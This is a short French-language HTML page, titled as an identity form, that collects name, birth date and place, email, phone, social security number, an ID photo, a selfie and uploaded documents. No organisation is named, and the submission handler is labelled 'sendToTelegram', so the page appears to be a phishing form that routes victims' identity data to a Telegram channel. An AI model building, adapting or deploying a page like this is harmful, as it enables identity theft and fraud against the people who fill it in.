<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Formulaire Identité</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <div class="container">
    <img src="https://files.oaiusercontent.com/file-000000001044a51f6ba7cdd0ec6c1a1f.jpg" alt="Logo" height="60">
    <h2>Formulaire d'identité</h2>
    <form name="upload-form" method="POST" enctype="multipart/form-data" data-netlify="true" data-netlify-handler="sendToTelegram">
      <input type="hidden" name="form-name" value="upload-form" />
      <label>Nom : <input type="text" name="nom" required></label><br>
      <label>Prénom : <input type="text" name="prenom" required></label><br>
      <label>Date de naissance : <input type="date" name="date_naissance" required></label><br>
      <label>Lieu de naissance : <input type="text" name="lieu_naissance" required></label><br>
      <label>Email : <input type="email" name="email" required></label><br>
      <label>Téléphone : <input type="tel" name="telephone" required></label><br>
      <label>Numéro de sécurité sociale : <input type="text" name="secu" required></label><br>
      <label>Statut : <input type="text" name="statut"></label><br>
      <label>Emploi : <input type="text" name="emploi"></label><br>
      <label>Photo d'identité : <input type="file" name="photo_identite" accept="image/*"></label><br>
      <label>Selfie : <input type="file" name="selfie" accept="image/*"></label><br>
      <label>Upload vos documents : <input type="file" name="vip_upload"></label><br>
      <button type="submit">Envoyer</button>
    </form>
  </div>
</body>
</html>
